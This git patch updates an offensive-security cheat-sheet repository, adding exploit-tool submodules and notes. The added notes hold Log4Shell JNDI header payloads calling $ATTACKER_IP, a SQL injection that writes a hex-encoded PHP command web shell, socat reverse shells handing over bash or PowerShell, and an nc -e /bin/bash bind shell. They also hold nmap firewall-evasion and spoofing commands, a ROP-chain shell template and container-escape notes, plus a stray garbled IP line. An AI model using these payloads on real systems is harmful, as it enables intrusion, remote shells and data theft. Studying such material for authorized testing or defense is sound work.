From 210ae2791cf54877e25aa38d9f71b2660794f616 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Mon, 14 Feb 2022 23:22:18 +0100
Subject: [PATCH] bump

---
 .gitmodules                                   | 24 +++++
 enumeration/Typo3Scan                         |  1 +
 enumeration/containers/deepce                 |  1 +
 .../buffer_overflow/bad_chars.py              |  0
 .../buffer_overflow/brainstorm.py             |  0
 .../buffer_overflow/buffer_overflow.py        |  0
 .../buffer_overflow/docs/amd64.md             |  0
 .../docs/amd64_instructions.md                |  0
 .../buffer_overflow/docs/buffer_overflow.md   |  0
 .../buffer_overflow/docs/cut_stack_in_half.md |  0
 .../docs/pwntools_specifics.md                |  0
 .../buffer_overflow/docs/ret_address_reuse.md |  0
 .../docs/shellcodes/setreuid_shell.as         |  0
 .../docs/shellcodes/setuid_shell.as           |  0
 .../{ => binaries}/buffer_overflow/fuzzer.py  |  0
 .../{ => binaries}/buffer_overflow/fuzzer2.py |  0
 .../buffer_overflow/fuzzer_BO.py              |  0
 .../buffer_overflow/pwn_fuzz.py               |  0
 exploit/binaries/buffer_overflow/ropping.md   | 28 ++++++
 exploit/binaries/buffer_overflow/ropstar      |  1 +
 exploit/buffer_overflow/peda                  |  1 -
 exploit/java/JNDI-Exploit-Kit                 |  1 +
 exploit/java/log4j-scan                       |  1 +
 exploit/java/log4shell.md                     |  3 +
 exploit/sqli/no_sqli.md                       |  4 +
 exploit/sqli/sqli.md                          |  6 ++
 exploit/web/http_header_injection.md          |  8 ++
 exploit/web/jwt/jwt_tool                      |  2 +-
 exploit/web/php/phpggc                        |  1 +
 misc/level3_hypervisor/docker_sec/docker.md   |  2 +-
 post_exploitation/priv_esc/sucrack            |  1 +
 reverse_shells/docs/socat.md                  |  9 +-
 reverse_shells/firewalls.md                   | 92 ++++++++++++++++++-
 33 files changed, 179 insertions(+), 7 deletions(-)
 create mode 160000 enumeration/Typo3Scan
 create mode 160000 enumeration/containers/deepce
 rename exploit/{ => binaries}/buffer_overflow/bad_chars.py (100%)
 rename exploit/{ => binaries}/buffer_overflow/brainstorm.py (100%)
 rename exploit/{ => binaries}/buffer_overflow/buffer_overflow.py (100%)
 rename exploit/{ => binaries}/buffer_overflow/docs/amd64.md (100%)
 rename exploit/{ => binaries}/buffer_overflow/docs/amd64_instructions.md (100%)
 rename exploit/{ => binaries}/buffer_overflow/docs/buffer_overflow.md (100%)
 rename exploit/{ => binaries}/buffer_overflow/docs/cut_stack_in_half.md (100%)
 rename exploit/{ => binaries}/buffer_overflow/docs/pwntools_specifics.md (100%)
 rename exploit/{ => binaries}/buffer_overflow/docs/ret_address_reuse.md (100%)
 rename exploit/{ => binaries}/buffer_overflow/docs/shellcodes/setreuid_shell.as (100%)
 rename exploit/{ => binaries}/buffer_overflow/docs/shellcodes/setuid_shell.as (100%)
 rename exploit/{ => binaries}/buffer_overflow/fuzzer.py (100%)
 rename exploit/{ => binaries}/buffer_overflow/fuzzer2.py (100%)
 rename exploit/{ => binaries}/buffer_overflow/fuzzer_BO.py (100%)
 rename exploit/{ => binaries}/buffer_overflow/pwn_fuzz.py (100%)
 create mode 100644 exploit/binaries/buffer_overflow/ropping.md
 create mode 160000 exploit/binaries/buffer_overflow/ropstar
 delete mode 160000 exploit/buffer_overflow/peda
 create mode 160000 exploit/java/JNDI-Exploit-Kit
 create mode 160000 exploit/java/log4j-scan
 create mode 100644 exploit/web/http_header_injection.md
 create mode 160000 exploit/web/php/phpggc
 create mode 160000 post_exploitation/priv_esc/sucrack

diff --git a/.gitmodules b/.gitmodules
index 4d93632..51ef318 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -109,3 +109,27 @@
 [submodule "exploit/windows/PrintNightmare"]
 	path = exploit/windows/PrintNightmare
 	url = https://github.com/ly4k/PrintNightmare.git
+[submodule "enumeration/containers/deepce"]
+	path = enumeration/containers/deepce
+	url = https://github.com/stealthcopter/deepce.git
+[submodule "enumeration/Typo3Scan"]
+	path = enumeration/Typo3Scan
+	url = https://github.com/whoot/Typo3Scan.git
+[submodule "exploit/web/php/phpggc"]
+	path = exploit/web/php/phpggc
+	url = https://github.com/ambionics/phpggc.git
+[submodule "post_exploitation/priv_esc/sucrack"]
+	path = post_exploitation/priv_esc/sucrack
+	url = https://github.com/hemp3l/sucrack.git
+[submodule "exploit/java/JNDI-Exploit-Kit"]
+	path = exploit/java/JNDI-Exploit-Kit
+	url = https://github.com/pimps/JNDI-Exploit-Kit.git
+[submodule "exploit/binaries/buffer_overflow/ropstar"]
+	path = exploit/binaries/buffer_overflow/ropstar
+	url = https://github.com/xct/ropstar.git
+[submodule "exploit/java/log4j-scan"]
+	path = exploit/java/log4j-scan
+	url = https://github.com/fullhunt/log4j-scan.git
+[submodule "misc/static-binaries"]
+	path = misc/static-binaries
+	url = https://github.com/andrew-d/static-binaries.git
diff --git a/enumeration/Typo3Scan b/enumeration/Typo3Scan
new file mode 160000
index 0000000..9ee2b90
--- /dev/null
+++ b/enumeration/Typo3Scan
@@ -0,0 +1 @@
+Subproject commit 9ee2b90114121ecd95ffc943a81aa1d01c054a2f
diff --git a/enumeration/containers/deepce b/enumeration/containers/deepce
new file mode 160000
index 0000000..0605062
--- /dev/null
+++ b/enumeration/containers/deepce
@@ -0,0 +1 @@
+Subproject commit 060506279e6a0a5127da7245e9dac58c76d64fb4
diff --git a/exploit/buffer_overflow/bad_chars.py b/exploit/binaries/buffer_overflow/bad_chars.py
similarity index 100%
rename from exploit/buffer_overflow/bad_chars.py
rename to exploit/binaries/buffer_overflow/bad_chars.py
diff --git a/exploit/buffer_overflow/brainstorm.py b/exploit/binaries/buffer_overflow/brainstorm.py
similarity index 100%
rename from exploit/buffer_overflow/brainstorm.py
rename to exploit/binaries/buffer_overflow/brainstorm.py
diff --git a/exploit/buffer_overflow/buffer_overflow.py b/exploit/binaries/buffer_overflow/buffer_overflow.py
similarity index 100%
rename from exploit/buffer_overflow/buffer_overflow.py
rename to exploit/binaries/buffer_overflow/buffer_overflow.py
diff --git a/exploit/buffer_overflow/docs/amd64.md b/exploit/binaries/buffer_overflow/docs/amd64.md
similarity index 100%
rename from exploit/buffer_overflow/docs/amd64.md
rename to exploit/binaries/buffer_overflow/docs/amd64.md
diff --git a/exploit/buffer_overflow/docs/amd64_instructions.md b/exploit/binaries/buffer_overflow/docs/amd64_instructions.md
similarity index 100%
rename from exploit/buffer_overflow/docs/amd64_instructions.md
rename to exploit/binaries/buffer_overflow/docs/amd64_instructions.md
diff --git a/exploit/buffer_overflow/docs/buffer_overflow.md b/exploit/binaries/buffer_overflow/docs/buffer_overflow.md
similarity index 100%
rename from exploit/buffer_overflow/docs/buffer_overflow.md
rename to exploit/binaries/buffer_overflow/docs/buffer_overflow.md
diff --git a/exploit/buffer_overflow/docs/cut_stack_in_half.md b/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.md
similarity index 100%
rename from exploit/buffer_overflow/docs/cut_stack_in_half.md
rename to exploit/binaries/buffer_overflow/docs/cut_stack_in_half.md
diff --git a/exploit/buffer_overflow/docs/pwntools_specifics.md b/exploit/binaries/buffer_overflow/docs/pwntools_specifics.md
similarity index 100%
rename from exploit/buffer_overflow/docs/pwntools_specifics.md
rename to exploit/binaries/buffer_overflow/docs/pwntools_specifics.md
diff --git a/exploit/buffer_overflow/docs/ret_address_reuse.md b/exploit/binaries/buffer_overflow/docs/ret_address_reuse.md
similarity index 100%
rename from exploit/buffer_overflow/docs/ret_address_reuse.md
rename to exploit/binaries/buffer_overflow/docs/ret_address_reuse.md
diff --git a/exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as b/exploit/binaries/buffer_overflow/docs/shellcodes/setreuid_shell.as
similarity index 100%
rename from exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as
rename to exploit/binaries/buffer_overflow/docs/shellcodes/setreuid_shell.as
diff --git a/exploit/buffer_overflow/docs/shellcodes/setuid_shell.as b/exploit/binaries/buffer_overflow/docs/shellcodes/setuid_shell.as
similarity index 100%
rename from exploit/buffer_overflow/docs/shellcodes/setuid_shell.as
rename to exploit/binaries/buffer_overflow/docs/shellcodes/setuid_shell.as
diff --git a/exploit/buffer_overflow/fuzzer.py b/exploit/binaries/buffer_overflow/fuzzer.py
similarity index 100%
rename from exploit/buffer_overflow/fuzzer.py
rename to exploit/binaries/buffer_overflow/fuzzer.py
diff --git a/exploit/buffer_overflow/fuzzer2.py b/exploit/binaries/buffer_overflow/fuzzer2.py
similarity index 100%
rename from exploit/buffer_overflow/fuzzer2.py
rename to exploit/binaries/buffer_overflow/fuzzer2.py
diff --git a/exploit/buffer_overflow/fuzzer_BO.py b/exploit/binaries/buffer_overflow/fuzzer_BO.py
similarity index 100%
rename from exploit/buffer_overflow/fuzzer_BO.py
rename to exploit/binaries/buffer_overflow/fuzzer_BO.py
diff --git a/exploit/buffer_overflow/pwn_fuzz.py b/exploit/binaries/buffer_overflow/pwn_fuzz.py
similarity index 100%
rename from exploit/buffer_overflow/pwn_fuzz.py
rename to exploit/binaries/buffer_overflow/pwn_fuzz.py
diff --git a/exploit/binaries/buffer_overflow/ropping.md b/exploit/binaries/buffer_overflow/ropping.md
new file mode 100644
index 0000000..8abd17c
--- /dev/null
+++ b/exploit/binaries/buffer_overflow/ropping.md
@@ -0,0 +1,28 @@
+# ROP Chaining
+
+## Usage
+
+* Find cyclic buffer size
+* Find gadgets via `ropper` or even better `ropstar`
+
+## Example
+```python
+from pwn import *
+
+s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")
+p = s.process(['sudo', '<process>'])
+
+offset=<found_offset_len>
+
+# take the ropchain from ropstar
+payload = cyclic(offset)
+payload += p64(0x4711)
+payload += p64(0x235)
+payload += p64(0x007)
+
+print(p.recv())
+p.sendline(payload)
+print(p.recv())
+p.sendline("/bin/sh")
+p.interactive(prompt='')
+```
diff --git a/exploit/binaries/buffer_overflow/ropstar b/exploit/binaries/buffer_overflow/ropstar
new file mode 160000
index 0000000..f025a2e
--- /dev/null
+++ b/exploit/binaries/buffer_overflow/ropstar
@@ -0,0 +1 @@
+Subproject commit f025a2e4923b501d68d24fa44b22869a84e29e3e
diff --git a/exploit/buffer_overflow/peda b/exploit/buffer_overflow/peda
deleted file mode 160000
index 84d38bd..0000000
--- a/exploit/buffer_overflow/peda
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43
diff --git a/exploit/java/JNDI-Exploit-Kit b/exploit/java/JNDI-Exploit-Kit
new file mode 160000
index 0000000..e464fac
--- /dev/null
+++ b/exploit/java/JNDI-Exploit-Kit
@@ -0,0 +1 @@
+Subproject commit e464facbc761a1b3530181a6f37c95925c197551
diff --git a/exploit/java/log4j-scan b/exploit/java/log4j-scan
new file mode 160000
index 0000000..ceae24f
--- /dev/null
+++ b/exploit/java/log4j-scan
@@ -0,0 +1 @@
+Subproject commit ceae24f4ebdbbdfc1dc350bab4d512d9dcf8027c
diff --git a/exploit/java/log4shell.md b/exploit/java/log4shell.md
index 65b8e98..87f8e99 100644
--- a/exploit/java/log4shell.md
+++ b/exploit/java/log4shell.md
@@ -25,6 +25,8 @@ curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449
 * Use HTTP header field as storage for payload or any other possible input field
 ```HTTP
 X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}
+Accept: ${jndi:ldap://$ATTACKER_IP:1389/foo}
+X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
 ```
 
 ## Usage
@@ -87,4 +89,5 @@ ${${::-j}ndi:rmi://attackerendpoint.com/}
 * Add the following line to `solr.in.sh`
 ```toml
 SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"
+10.10.90.21210.10.90.212
 ```
diff --git a/exploit/sqli/no_sqli.md b/exploit/sqli/no_sqli.md
index 9245473..b75f00f 100644
--- a/exploit/sqli/no_sqli.md
+++ b/exploit/sqli/no_sqli.md
@@ -32,3 +32,7 @@ $regex
 ```sh
 username=admin&password[$ne]=admin
 ```
+* JSON
+```json
+{"username":"user","password":{"$ne":""} }
+```
diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md
index ac93307..f242e38 100644
--- a/exploit/sqli/sqli.md
+++ b/exploit/sqli/sqli.md
@@ -121,6 +121,12 @@ id=(SELECT banner FROM v$version) # oracle
 1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
 ```
 
+## Insert
+* Insert file through insertion of `system()` or `exec_shell()` and a get parameter
+```sql
+<cookieID>'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- -
+```
+
 ### Examples
 * sqli inside HTTP request to an API. Five values inside select have been discovered before
 ```HTTP
diff --git a/exploit/web/http_header_injection.md b/exploit/web/http_header_injection.md
new file mode 100644
index 0000000..9ff30aa
--- /dev/null
+++ b/exploit/web/http_header_injection.md
@@ -0,0 +1,8 @@
+# HTTP Header Injection & Cache Poisoning
+
+## References
+
+* [Portswigger]https://portswigger.net/web-security/host-header
+* [Spring project](https://github.com/spring-projects/spring-security/issues/4310)
+* [Skeletonscribe.com](https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html)
+
diff --git a/exploit/web/jwt/jwt_tool b/exploit/web/jwt/jwt_tool
index eb411ea..aa496cf 160000
--- a/exploit/web/jwt/jwt_tool
+++ b/exploit/web/jwt/jwt_tool
@@ -1 +1 @@
-Subproject commit eb411ea89b11df4485733201860619883a4f05e6
+Subproject commit aa496cf0e2f832318afd043e4baac6cef0502689
diff --git a/exploit/web/php/phpggc b/exploit/web/php/phpggc
new file mode 160000
index 0000000..9121c3f
--- /dev/null
+++ b/exploit/web/php/phpggc
@@ -0,0 +1 @@
+Subproject commit 9121c3f2c95b9b7726f663a1f2ce6526be69c713
diff --git a/misc/level3_hypervisor/docker_sec/docker.md b/misc/level3_hypervisor/docker_sec/docker.md
index a8889f9..f1cc794 100644
--- a/misc/level3_hypervisor/docker_sec/docker.md
+++ b/misc/level3_hypervisor/docker_sec/docker.md
@@ -63,7 +63,6 @@ or
 docker run -v /:/host --rm -it <imageID> chroot /host/ bash
 ```
 
-
 ## Shared Namespaces
 * Namespaces
 * Cgroups
@@ -106,6 +105,7 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 mkdir /mnt/hostdev
 mount /dev/<hostVda> /mnt/hostdev
 ```
+* Check `/dev` as well !!! and mount device
 
 ## Creating a Container from inside another container
 
diff --git a/post_exploitation/priv_esc/sucrack b/post_exploitation/priv_esc/sucrack
new file mode 160000
index 0000000..c738b9a
--- /dev/null
+++ b/post_exploitation/priv_esc/sucrack
@@ -0,0 +1 @@
+Subproject commit c738b9a6d78b6aa517767d7621480a3f3dfb4dd6
diff --git a/reverse_shells/docs/socat.md b/reverse_shells/docs/socat.md
index 8ead11a..107a651 100644
--- a/reverse_shells/docs/socat.md
+++ b/reverse_shells/docs/socat.md
@@ -6,14 +6,19 @@
 ```socat TCP-L:<PORT> file:`tty`,raw,echo=0```
 
 ### windows target
-```socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes```
+```sh
+socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
+```
 
 ### linux target
-```socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"```
+```sh
+socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
+```
 
 ## Bind Shell
 ### generic connect
 ```socat TCP:<TARGET-IP>:<TARGET-PORT> -```
+
 ### windows target listener
 ```socat TCP-L:<PORT> EXEC:powershell.exe,pipes```
 
diff --git a/reverse_shells/firewalls.md b/reverse_shells/firewalls.md
index e797763..72085cc 100644
--- a/reverse_shells/firewalls.md
+++ b/reverse_shells/firewalls.md
@@ -1,11 +1,99 @@
 # Firewall Handling
 
-# Windows
+## Types
+
+* Packet filtering
+* Circuit level gateway
+* Stateful inspection
+* Proxy
+* Next generation firewall
+* Cloud firewall and FWaaS
+
+## Rules
+
+### Windows
 ```sh
 netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
 ```
 
-# CentOS
+### CentOS
 ```sh
 firewall-cmd --zone=public --add-port=57869/tcp
 ```
+
+## Circumvention
+
+* IP/MAC/Port spoofing
+* Fragmentation, MTU, data length
+* Header modification
+
+### nmap
+
+#### Spoofing
+* __Decoy__ `-D` , mixin real IP address with random adresses. Every port will be requested by any of these addresses.
+```sh
+sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
+sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
+```
+* __Proxy__
+```sh
+sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
+```
+* __Spoofed MAC__
+```sh
+sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
+```
+* __Spoofed IP__
+```sh
+sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
+```
+* __Port Number__, select a port which is whitelisted. Frequently this is 53,80,44
+```sh
+sudo nmap -F --source-port 443 $TARGET_IP
+```
+* __Fragmentation__, eth header + 20 bytes header size +  bytes fragments via `-f`, or 16 bytes via `-ff`
+```sh
+sudo nmap -Pn -F -f $TARGET_IP
+```
+* __MTU__, works like fragmentation, `-f` == `--mtu 8`
+
+```sh
+sudo nmap -Pn -F --mtu 8 
+```
+* __DATA Length__, eth header + IP header + prepend padding segment size to values of bytes
+```sh
+sudo nmap -Pn -F --data-length 64 $TARGET_IP
+```
+
+#### Header Fields
+
+* __TTL__
+```sh
+sudo nmap -Pn -F --ttl 64 $TARGET_IP
+```
+* __IP OPTIONS__, `--ip-options` recordsas hex String
+
+    * Route, `R`
+    * Timestamp, `T`
+    * Route + Timestamp, `U`
+    * Loose source routing, `L $IP $IP $IP`
+    * Strict source routing, `S $IP $IP $IP`
+
+* __Checksum__, craft bad checksum via `--badsum` to check errors
+```sh
+sudo nmap -Pn -F --badsum $TARGET_IP
+```
+
+#### After the FW
+* __Hopping__, listen via netcat to catch that port
+* __Tunneling__, relay open after passsing the firewall to connect to the closed port
+```sh
+nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
+```
+* __Non standard ports__, open bin shell via 
+```sh
+nc -lvnp 8888 -e /bin/bash
+```
+and connect
+
+